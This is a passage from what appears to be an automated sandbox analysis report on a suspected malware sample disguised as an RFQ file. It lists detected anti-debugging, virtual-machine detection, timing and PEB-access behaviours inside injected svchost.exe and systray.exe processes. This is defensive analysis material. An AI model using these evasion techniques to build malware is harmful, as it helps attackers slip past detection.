          Source: explorer.exe, 00000003.00000000.1434848584.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | API call chain: ExitProcess graph end node graph_1-98274
          Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040ACE0 LdrLoadDll, 2_2_0040ACE0
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_001541FD BlockInput, 1_2_001541FD
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_000E3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_000E3B4C
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00115CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00115CCC
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0015C304 LoadLibraryA,GetProcAddress, 1_2_0015C304
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00EF34C0 mov eax, dword ptr fs:[00000030h] 1_2_00EF34C0
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00EF3520 mov eax, dword ptr fs:[00000030h] 1_2_00EF3520
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00EF1E70 mov eax, dword ptr fs:[00000030h] 1_2_00EF1E70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h] 2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h] 2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B035C mov eax, dword ptr fs:[00000030h] 2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h] 2_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h] 2_2_030D8350
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0310634F mov eax, dword ptr fs:[00000030h] 2_2_0310634F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D437C mov eax, dword ptr fs:[00000030h] 2_2_030D437C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h] 2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305438F mov eax, dword ptr fs:[00000030h] 2_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028397 mov eax, dword ptr fs:[00000030h] 2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h] 2_2_030EC3CD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h] 2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h] 2_2_030B63C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h] 2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h] 2_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h] 2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
